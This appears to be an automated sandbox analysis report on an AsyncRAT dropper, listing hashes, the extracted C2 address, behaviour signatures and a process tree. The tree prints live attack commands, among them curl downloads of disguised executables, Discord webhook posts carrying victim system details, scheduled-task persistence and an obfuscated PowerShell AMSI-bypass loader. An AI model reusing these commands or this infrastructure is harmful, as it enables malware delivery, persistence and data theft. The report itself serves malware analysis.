Analysis

  • max time kernel
    105s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 08:24

General

  • Target

    Dropper.exe

  • Size

    12KB

  • MD5

    b11d9f89c1129428957175b7c55e8637

  • SHA1

    6a1530364e3bf3c13a6500bdd313e1d8d4294301

  • SHA256

    b390f949531dac7a42bee35fc98e1b9890361b2be5fa3efcc8cae8263174244f

  • SHA512

    e368f3db1c511c6cfbb95f04c98e9df7fcda718f3f9c56dd34f5e9595eda9d072dc4af351a7ea7a2cea6f65117f7e2dd98fc97d6d6631673fdcdf939abe963ba

  • SSDEEP

    384:fHPFcbjfi27q9bJnz6PbQGw+pfolwmfhhDj4VCsL:3yfiD9bJMbKwkhhD0wsL

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:388
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{27885a73-c420-4253-ae9c-f13098271dfd}
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1724
          • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
            "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1372
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
              4⤵
                PID:2608
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  5⤵
                    PID:2520
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1804
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp58D9.tmp.bat""
                  4⤵
                  • Modifies data under HKEY_USERS
                  PID:1316
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    5⤵
                      PID:1392
                    • C:\Windows\system32\timeout.exe
                      timeout 3
                      5⤵
                      • Delays execution with timeout.exe
                      PID:5300
                • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                  "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                  3⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4496
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
                    4⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:5244
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      5⤵
                        PID:5252
                  • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                    "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                    3⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1224
              • C:\Windows\system32\lsass.exe
                C:\Windows\system32\lsass.exe
                1⤵
                  PID:688
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                  1⤵
                    PID:968
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                    1⤵
                      PID:528
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                      1⤵
                        PID:392
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        1⤵
                          PID:1032
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1052
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Drops file in System32 directory
                            PID:1192
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:1248
                            • C:\Windows\system32\taskhostw.exe
                              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                              2⤵
                                PID:2536
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UAuQcJGKypGD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yYJLRqLEqRoUcH,[Parameter(Position=1)][Type]$QTNCgivVQc)$sVLBoVxAEhm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+'yp'+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+',P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'e'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+',A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$sVLBoVxAEhm.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+'g'+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yYJLRqLEqRoUcH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$sVLBoVxAEhm.DefineMethod(''+'I'+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](78)+'e'+[Char](119)+'Sl'+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$QTNCgivVQc,$yYJLRqLEqRoUcH).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $sVLBoVxAEhm.CreateType();}$LUfPqQffFqxox=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'te'+'m'+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+'i'+'cros'+'o'+'ft'+'.'+''+[Char](87)+''+'i'+'n32'+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+'et'+'h'+''+'o'+''+'d'+''+'s'+'');$aXaWoJrtimlFtD=$LUfPqQffFqxox.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+'dd'+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'i'+'c'+',S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qUZmQBWBRRVNkYkQgdk=UAuQcJGKypGD @([String])([IntPtr]);$ToChBmRYHztiJRtioFpvSu=UAuQcJGKypGD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZzQuQiIppNe=$LUfPqQffFqxox.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+'2'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lDbCmJxOGgFUAP=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$ZzQuQiIppNe,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'rary'+[Char](65)+'')));$tAAdNBwavZOaSfhYg=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$ZzQuQiIppNe,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'alPr'+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$jvOJQge=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lDbCmJxOGgFUAP,$qUZmQBWBRRVNkYkQgdk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$QfynZrrWdLekAewLH=$aXaWoJrtimlFtD.Invoke($Null,@([Object]$jvOJQge,[Object]('Am'+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+[Char](102)+''+'e'+''+'r'+'')));$bKOIucZbAQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAAdNBwavZOaSfhYg,$ToChBmRYHztiJRtioFpvSu).Invoke($QfynZrrWdLekAewLH,[uint32]8,4,[ref]$bKOIucZbAQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QfynZrrWdLekAewLH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAAdNBwavZOaSfhYg,$ToChBmRYHztiJRtioFpvSu).Invoke($QfynZrrWdLekAewLH,[uint32]8,0x20,[ref]$bKOIucZbAQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                2⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1308
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  3⤵
                                    PID:3220
                                • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1700
                                • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  2⤵
                                  • Executes dropped EXE
                                  PID:5660
                                • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                                  2⤵
                                    PID:2556
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                  1⤵
                                    PID:1280
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                    1⤵
                                      PID:1336
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                      1⤵
                                        PID:1348
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1420
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1440
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                            1⤵
                                              PID:1464
                                              • C:\Windows\system32\sihost.exe
                                                sihost.exe
                                                2⤵
                                                  PID:2432
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                1⤵
                                                  PID:1508
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                  1⤵
                                                    PID:1596
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1656
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      1⤵
                                                        PID:1748
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1812
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                          1⤵
                                                            PID:1856
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                            1⤵
                                                              PID:1880
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:1888
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:1984
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                  1⤵
                                                                    PID:2016
                                                                  • C:\Windows\System32\spoolsv.exe
                                                                    C:\Windows\System32\spoolsv.exe
                                                                    1⤵
                                                                      PID:1720
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2076
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2148
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2444
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:2544
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                            1⤵
                                                                              PID:2580
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                              1⤵
                                                                                PID:2588
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                1⤵
                                                                                • Drops file in System32 directory
                                                                                PID:2660
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                1⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2740
                                                                              • C:\Windows\sysmon.exe
                                                                                C:\Windows\sysmon.exe
                                                                                1⤵
                                                                                  PID:2776
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                  1⤵
                                                                                    PID:2804
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                    1⤵
                                                                                      PID:2832
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2840
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:2768
                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3152
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                            PID:3268
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
                                                                                              2⤵
                                                                                              • Checks computer location settings
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4544
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
                                                                                                3⤵
                                                                                                • Checks computer location settings
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1964
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2684
                                                                                                  • C:\Windows\SysWOW64\curl.exe
                                                                                                    curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                    5⤵
                                                                                                      PID:3692
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                    4⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3920
                                                                                                    • C:\Windows\SysWOW64\curl.exe
                                                                                                      curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                      5⤵
                                                                                                        PID:3916
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                                      4⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2316
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
                                                                                                        5⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1696
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                                                                                                          6⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:2668
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1C5D.tmp.bat""
                                                                                                        5⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:2524
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout 3
                                                                                                          6⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:4988
                                                                                                        • C:\Users\Admin\AppData\Roaming\$77-aachost.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\$77-aachost.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2236
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 2\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 34C081BFBE1DDA88F723\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl
                                                                                                            7⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4396
                                                                                                            • C:\Windows\system32\curl.exe
                                                                                                              curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 2\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 34C081BFBE1DDA88F723\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl
                                                                                                              8⤵
                                                                                                                PID:1068
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3904
                                                                                                        • C:\Windows\SysWOW64\curl.exe
                                                                                                          curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                          5⤵
                                                                                                            PID:4932
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                                          4⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4304
                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                                            5⤵
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:4860
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                          4⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4216
                                                                                                          • C:\Windows\SysWOW64\curl.exe
                                                                                                            curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                            5⤵
                                                                                                              PID:700
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            • Suspicious use of SetWindowsHookEx
